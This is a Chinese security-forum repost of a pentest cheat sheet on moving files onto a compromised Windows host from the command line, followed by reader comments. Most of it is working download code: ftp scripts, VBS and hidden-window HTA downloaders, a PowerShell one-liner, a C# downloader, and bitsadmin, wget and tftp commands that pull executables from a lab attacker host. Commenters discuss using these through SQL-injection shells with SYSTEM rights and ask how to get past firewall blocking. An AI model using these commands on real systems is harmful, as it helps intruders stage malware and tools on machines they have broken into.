cmd上传文件的N种方法

2016-12-14 16:51:06 22 2033



注:转载文,旨在技术交流 如果侵犯某方权益,请联系删除。

【序】
老君推荐的好文,大家一起分享下。
我百度看了下,不少社区都有这篇文章,很全面。

0x00 前言
在渗透测试的过程中,常常需要向目标主机上传文件。所以本文就对该技巧做一下总结。



0x02 测试环境
   OS:Win7 x86



0x03 通用上传方法

  1、debug

debug是一个程序调试工具,功能包括:
· 直接输入,更改,跟踪,运行汇编语言源程序

· 观察操作系统的内容

· 查看ROM BIOS的内容

· 观察更改RAM内部的设置值

· 以扇区或文件的方式读写软盘数据



特别的是它还有一个功能可以将十六进制代码转换为可执行文件:





结合本文的目标,思路如下:
  1. 1.把需要上传的exe转换成十六进制hex的形式

  2. 2.通过echo命令将hex代码写入文件

  3. 3.使用debug功能将hex代码还原出exe文件
实际测试:

kali中的exe2bat.exe提供了这个功能,位于 /usr/share/windows-binaries

如图3



操作步骤:
kali:如图4
  1. cd /usr/share/windows-binaries

  2. wine exe2bat.exe ssss2.exe ssss2.txt
执行后会生成ssss2.txt,将里面的内容复制粘贴到cmd命令行下依次执行


执行后会生成1.dll、123.hex、ssss.exe

如图4



注:

exe2bat不支持大于64kb的文件

如图5





  2、ftp

搭建好ftp服务器:

ip:192.168.174.151
文件:ssss2.exe


按顺序执行如下代码即可通过ftp来下载文件

cmd:
  1. echo open 192.168.174.151 21> ftp.txt
  2. echo ftp>> ftp.txt
  3. echo bin >> ftp.txt
  4. echo ftp>> ftp.txt
  5. echo GET ssss2.exe >> ftp.txt
  6. ftp -s:ftp.txt
如图6


注:

初次使用ftp下载防火墙会弹框拦截,使用前记得要先添加防火墙规则




  3、vbs

vbs downloader,使用msxml2.xmlhttp和adodb.stream对象

如下代码保存为.vbs文件:
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.174.145/ssss2.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\test\update\ssss2.exe",2
对应到cmd下的命令为:
  1. echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
  2. echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
  3. echo Post.Open "GET","http://192.168.174.145/ssss2.exe",0 >>download.vbs
  4. echo Post.Send() >>download.vbs
  5. echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
  6. echo aGet.Mode = 3 >>download.vbs
  7. echo aGet.Type = 1 >>download.vbs
  8. echo aGet.Open() >>download.vbs
  9. echo aGet.Write(Post.responseBody) >>download.vbs
  10. echo aGet.SaveToFile "C:\test\update\ssss2.exe",2 >>download.vbs
按顺序依次执行后会生成download.vbs,然后执行download.vbs即可实现下载ssss2.exe




  4、powershell

cmd:
  1. powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.174.145/ssss2.exe','C:\test\update\ssss2.exe')
  5、csc

csc.exe是微软.NET Framework 中的C#编译器,Windows系统中默认包含,可在命令行下将cs文件编译成exe

c# downloader的代码为:
using System.Net;
namespace downloader
{
    class Program
    {
        static void Main(string[] args)
        {
            WebClient client = new WebClient();
            string URLAddress = @"http://192.168.174.145/ssss2.exe";
            string receivePath = @"C:\test\update\";
            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName
        (URLAddress));
        }
    }
}
使用echo将代码依次写入文件download.cs中,然后调用csc.exe编译cs文件


执行
  1. C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:C:\tes
  2. t\update\download.exe C:\test\update\download.cs
如图7成功生成download.exe





  6、hta

添加最小化和自动退出hta程序的功能,执行过程中会最小化hta窗口,下载文件结束后自动退出hta程序

以下代码保存为.hta文件:
<html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.174.145/ssss2.exe",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = new ActiveXObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\\test\\update\\ssss2.exe", 2);
    Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</head>
<body>
</body>  
</html>
7、bitsadmin

bitsadmin是一个命令行工具,可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带


使用方法:

cmd下:
  1. bitsadmin /transfer n http://download.sysinternals.com/files/PSTools.zip  C:\test\update\PSTools.zip
下载成功如图8:


注:


不支持https、ftp协议

使用kali的simplehttpserver作服务器会报错



0x04 补充上传方法

以上均为系统默认包含的程序,结合以上方法并借助于第三方工具也能够实现功能

这里介绍的思路是可先通过bitsadmin来下载第三方工具,然后利用第三方工具进行传输文件


1、wget:
  1. bitsadmin /transfer n http://www.interlog.com/~tcharron/wgetwin-1_5_3_1-binary.zip  C:\test\update\wget.zip
运行后会下载wget的压缩包wget.zip


注:

Windows系统默认不包含解压缩zip文件的命令,但是可以通过vbs来实现解压缩zip文件

vbs实现解压缩:

以下代码保存为.vbs文件:
UnZip "C:\test\update\wget.zip","C:\test\update\wget\"
Sub UnZip(ByVal myZipFile, ByVal myTargetDir)
    Set fso = CreateObject("Scripting.FileSystemObject")
    If NOT fso.FileExists(myZipFile) Then
        Exit Sub
    ElseIf fso.GetExtensionName(myZipFile) <> "zip" Then
        Exit Sub
    ElseIf NOT fso.FolderExists(myTargetDir) Then
        fso.CreateFolder(myTargetDir)
    End If
    Set objShell = CreateObject("Shell.Application")
    Set objSource = objShell.NameSpace(myZipFile)
    Set objFolderItem = objSource.Items()
    Set objTarget = objShell.NameSpace(myTargetDir)
    intOptions = 256
    objTarget.CopyHere objFolderItem, intOptions
End Sub
代码来自于

http://demon.tw/programming/vbs-unzip-file.html


成功解压缩后就可通过wget.exe来传输文件
  1. C:\test\update\wget\wget.exe http://192.168.174.145/ssss2.exe
如图9





  2、ftfp

思路同上,先通过bitsadmin下载tftp.exe,然后利用tftp传输文件
  1. bitsadmin /transfer n http://www.winagents.com/downloads/tftp.exe C:\test\update\tftp.exe
下载成功后利用tftp传输文件:
  1. tftp -i 192.168.174.151 GET tftp\ssss2.exe C:\test\update\ssss2.exe
注:


默认防火墙会拦截

关掉防火墙或者添加规则即可

如图10



0x05 小结

本文对一些常用的通过cmd来传输文件的技巧做了整理,侧重于介绍其中较为通用简便的方法,所以并未介绍其他需要配置开发环境的实现方法,如Python、Ruby、Php等

关于作者

接地气58篇文章669篇回复

命由己造 ;水到渠成。

评论22次

要评论?请先  登录  或  注册
  • 22楼
    2017-3-19 00:21

    我猜这篇文章被顶起来应该又是最近的st2...... 支持一下 windows下居然还能.net直接编译是我没想到的还有hta我也到时候测试一下

  • 21楼
    2017-3-17 15:29

    找了好久 终于找到了。收藏了,其实vbs的 下载者 很爽,

  • 20楼
    2017-3-17 15:23

    大表哥思路很广,收藏了

  • 19楼
    2017-3-3 10:31

    写的很全,收藏了

  • 18楼
    2016-12-27 21:18
    wdh20000

    sqlmap --os-shell 中写进去的命令会按字母排列顺序来执行该怎么解决?

    1

    按照字母排列顺序来执行???

  • 17楼
    2016-12-27 21:10

    之前遇到一个比较坑爹的注入点,利用sqlserver执行命令,然后每次命令都会执行两次,然后echo两次,ftp里面的东西就写了两次。。。也是后来才知道bitsadmin的,确实很好用

  • 16楼
    2016-12-27 20:37

    CMD的功能强大。只是不能全记住记个大概用到了在百度下

  • 15楼
    2016-12-27 17:23

    可以的,收藏了。

  • 14楼
    2016-12-21 00:20

    这个可以有

  • 13楼
    2016-12-20 23:48

    看到个不常用的,不错

  • 12楼
    2016-12-19 14:27

    貌似以前在某云上看到过

  • 11楼
    2016-12-16 22:24

    学习了 感谢

  • 10楼
    2016-12-15 19:14

    sqlmap --os-shell 中写进去的命令会按字母排列顺序来执行该怎么解决?

  • 9楼
    2016-12-15 19:01

    6666,一直在找这方面的文章,终于来了

  • 8楼
    2016-12-15 18:37

    整理的很全,收藏了。

  • 7楼
    2016-12-14 22:51

    多一条思路多一条路。。感谢分享

  • 6楼
    2016-12-14 20:22

    求windows2003x86 最简单的下载文件方法``谢谢`

  • 5楼
    2016-12-14 20:15

    膜,内网渗透的参考文章

  • 4楼
    2016-12-14 18:22

    补充一个curl -o

  • 3楼
    2016-12-14 18:04

    好文章,收藏了。随便回复一下二楼一个我遇到的。这种可以用在注入点,dba权限下,os-shell执行whoami为system等权限下使用。问题:当时我在注入点中使用cmd来通过ftp远程下载文件到服务器,但是就是不成功,然后自己本地测试发现好像就是防火墙拦截的原因。那么有办法解决防火墙?或者通过其他上传办法可以绕过防火墙检测么?(手上有的就是一个注入点,dba+system权限)。